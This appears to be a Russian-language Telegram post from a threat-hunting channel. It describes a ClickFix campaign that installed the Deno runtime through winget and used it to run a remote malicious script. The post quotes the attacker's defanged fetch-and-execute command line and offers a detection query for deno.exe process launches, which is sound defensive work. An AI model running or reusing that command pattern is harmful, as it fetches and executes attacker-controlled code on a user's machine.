TGViewer
Know Your Adversary Know Your Adversary @knowyouradversary · 1.58K subscribers
Post #471 727
Всем привет!

Сегодня поговорим о JavaScript (T1059.007) и о том, как атакующие злоупотребляют легитимной средой его выполнения.

В рамках очередной ClickFix-кампании, злоумышленники использовали довольно интересные техники. Во-первых, они использовали winget.exe для загрузки и инсталляции среды выполнения Deno. Во-вторых, использовали Deno для запуска вредоносной нагрузки с удаленного сервера, подконтрольного атакующим:

deno.exe run -A hxxp://webstizkgao[.]com/v020def066f14754be9.js


Кажется, злонамеренное использование Deno может быть отличной целью для проактивного поиска:

event_type: "processcreatewin"

AND

proc_file_originalfilename: "deno.exe"

AND

cmdline: "run"


Скоро увидимся!

English version
More from @knowyouradversary
  1. Sep 25, 2026Всем привет! Уже на следующей неделе состоится KazHackStan 2026. В этом году я снова буду…
  2. Sep 22, 2026Всем привет! Обычно программы-вымогатели не демонстрируют применение интересных техник, но…
  3. Sep 17, 2026Всем привет! Как вы знаете, злоумышленники нередко используют различные интерпретаторы ком…
  4. Sep 9, 2026Всем привет! Сегодня мы поговорим о технике Direct Volume Access (T1006), которая нередко…
  5. Aug 26, 2026Всем привет! Надеюсь, вы помните, что сбор информации о скомпрометированной системе - один…
  6. Aug 22, 2026Всем привет! Как вы наверняка знаете, техника Modify Registry (T1112) позволяет атакующим…
Threads Profile ViewerView any public Threads profile without an account.Open ThreadLook →Writing with AI? Make it sound human.Metric37 rewrites AI drafts so they read naturally. Free AI detector, 1,500 words free.Try Metric37 →